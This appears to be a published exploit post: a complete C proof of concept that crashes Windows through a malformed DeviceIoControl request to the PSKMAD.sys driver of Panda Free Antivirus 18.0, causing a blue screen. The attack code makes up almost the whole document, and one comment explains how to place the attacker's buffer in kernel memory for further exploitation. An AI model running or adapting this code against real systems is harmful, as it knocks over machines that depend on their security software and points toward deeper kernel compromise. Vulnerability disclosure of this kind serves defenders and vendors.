Panda Free Antivirus - 'PSKMAD.sys' Denial of Service
Source: http://www.saptech-erp.com.au  Author: Baris  Published: 2017-05-05
/*
# Exploit Title: Panda Cloud Antivirus Free - 'PSKMAD.sys' - BSoD - denial of service
# Date: 2017-04-29
# Exploit Author: Peter baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://download.cnet.com/Panda-Cloud-Antivirus-Free-Edition/3000-2239_4-10914099.html?part=dl-&subj=dl&tag=button&lang=en
# Version: 18.0
# Tested on: Windows 7 SP1 Pro x64, Windows 10 Pro x64
# CVE : requested
*/
 
#include "stdafx.h"
#include <stdio.h>
#include <Windows.h>
#include <winioctl.h>
 
 
#define DEVICE_NAME L"\\\\.\\PSMEMDriver"
 
LPCTSTR FileName = (LPCTSTR)DEVICE_NAME;
HANDLE GetDeviceHandle(LPCTSTR FileName) {
    HANDLE hFile = NULL;
 
    hFile = CreateFile(FileName,
        GENERIC_READ | GENERIC_WRITE,
        0,
        0,
        OPEN_EXISTING,
        NULL,
        0);
 
    return hFile;
}
 
int main()
{
 
    HANDLE hFile = NULL;
    PVOID64 lpInBuffer = NULL;
    DWORD lpBytesReturned = 0; // DeviceIoControl takes an LPDWORD for the returned byte count
    PVOID64 BuffAddress = NULL;
    SIZE_T BufferSize = 0x800;
    
    printf("Trying to get the handle for the PSMEMDriver device.\r\n");
    
    hFile = GetDeviceHandle(FileName);
 
    if (hFile == INVALID_HANDLE_VALUE) {
        printf("Can't get the device handle, no BSoD today. 0x%X\r\n", GetLastError());
        return 1;
    }
 
    // Allocate memory for our buffer
    lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    
 
    if (lpInBuffer == NULL) {
        printf("VirtualAlloc() failed. \r\n");
        CloseHandle(hFile); // do not leak the device handle on the error path
        return 1;
    }
    
 
    BuffAddress = (PVOID64)(((ULONG64)lpInBuffer));
    *(PULONG64)BuffAddress = (ULONG64)0x542DF91B; //Pool header tag???
    BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x4));
    *(PULONG64)BuffAddress = (ULONG64)0x42424242;
    BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x8));
    
    RtlFillMemory(BuffAddress, BufferSize-0x8 , 0x41);
 
 
 
        DeviceIoControl(hFile,
            0xb3702c38,
            lpInBuffer,
            NULL,  //Change it to BufferSize and put a bp PSKMAD+3150 -> rax will point to our buffer in the kernel memory
            NULL,
            NULL,
            &lpBytesReturned,
            NULL);
 
    /*This part is pretty much useless, just wanted to be nice in case the machine survives.*/
    printf("Cleaning up.\r\n");
    VirtualFree((LPVOID)lpInBuffer, 0, MEM_RELEASE); // dwSize must be 0 when using MEM_RELEASE
    CloseHandle(hFile);
    printf("Resources freed up.\r\n");
    return 0;
}
 